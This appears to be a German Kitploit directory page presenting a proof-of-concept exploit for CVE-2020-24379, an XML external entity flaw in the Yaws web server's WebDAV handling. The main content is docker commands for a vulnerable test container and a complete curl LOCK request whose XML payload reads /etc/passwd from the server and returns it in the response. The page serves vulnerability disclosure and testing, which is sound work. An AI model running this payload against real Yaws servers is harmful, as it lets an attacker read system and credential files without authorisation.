Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
poc-yaws-dav-xxe — Yaws-Webserver XML-External-Entity-Injection POC | Kitploit
Tools/GitHubGitHub/vulnbe/poc-yaws-dav-xxe
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubvulnbe/poc-yaws-dav-xxe

poc-yaws-dav-xxe

Yaws-Webserver XML-External-Entity-Injection POC

Repository anzeigen
1vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

XXE im Yaws-Webserver (CVE-2020-24379)

Proof of Concept

Test-Image erstellen:

docker build -t vulnbe/yaws-pocs:xxe-dav-mod -f Dockerfile .

und/oder

Container ausführen docker run --rm -d -i -p 127.0.0.1:8000:8080 vulnbe/yaws-pocs:xxe-dav-mod

Dann ausführen:

root@kitploit:~
curl -i -s -k -X LOCK http://localhost:8000/ -H 'Timeout: Second-1' \
  --data-binary @- << EOF
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/passwd">
]>
<d:lockinfo xmlns:d="DAV:">
  <d:lockscope><d:exclusive/></d:lockscope>
  <d:locktype><d:write/></d:locktype>
  <d:owner>
  <d:href><r>&sp;</r></d:href>
  </d:owner>
  </d:lockinfo>
EOF

Danksagung

Alexey Pronin (@vulnbe)

Referenzen

  • Schwachstellenanalyse
  • Yaws auf GitHub
  • CVE-2020-24379
  • CWE-611: Improper Restriction of XML External Entity Reference
Tool herunterladen